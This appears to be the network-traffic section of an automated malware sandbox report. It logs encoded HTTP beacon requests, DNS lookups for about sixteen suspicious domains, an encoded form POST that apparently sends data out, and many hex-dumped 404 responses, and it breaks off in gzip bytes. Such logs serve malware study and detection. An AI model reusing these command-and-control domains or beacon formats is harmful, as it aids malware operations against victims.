Source: global traffic | HTTP traffic detected:
GET /ivyl/?bX=R3Qz1Cq/YEXK51DnfrEfG6FZDYGRURJsK8S8Pa4nsScgDMDttNnynOTz2BK+/4aKVNhzLsJ6XObNN2Y75FAxAaoazEpO0rybbGrvB+WgGgze1Cytk6YUwSk/iMHlseUc1g==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.070001350.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.726075.buzz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.monos.shop
Source: global traffic | DNS traffic detected: DNS query: www.726075.buzz
Source: global traffic | DNS traffic detected: DNS query: www.freepicture.online
Source: global traffic | DNS traffic detected: DNS query: www.318st.com
Source: global traffic | DNS traffic detected: DNS query: www.hm62t.top
Source: global traffic | DNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
Source: global traffic | DNS traffic detected: DNS query: www.mfgamecompany.shop
Source: global traffic | DNS traffic detected: DNS query: www.quilo.life
Source: global traffic | DNS traffic detected: DNS query: www.qiluqiyuan.buzz
Source: global traffic | DNS traffic detected: DNS query: www.bola88site.one
Source: global traffic | DNS traffic detected: DNS query: www.kckartal.xyz
Source: global traffic | DNS traffic detected: DNS query: www.mizuquan.top
Source: global traffic | DNS traffic detected: DNS query: www.kxshopmr.store
Source: global traffic | DNS traffic detected: DNS query: www.capbear.net
Source: global traffic | DNS traffic detected: DNS query: www.groet.online
Source: global traffic | DNS traffic detected: DNS query: www.070001350.xyz
            Source: unknownHTTP traffic detected: POST /xcfw/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.freepicture.onlineOrigin: http://www.freepicture.onlineReferer: http://www.freepicture.online/xcfw/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d Data Ascii: bX=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:29:43 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:29:59 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:30:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:30:04 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:30:07 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:30:21 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:30:24 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:30:26 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:30:29 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Mon, 16 Sep 2024 07:30:43 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-09-16T07:30:48.3042146Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:02 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:05 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:07 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:31:10 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 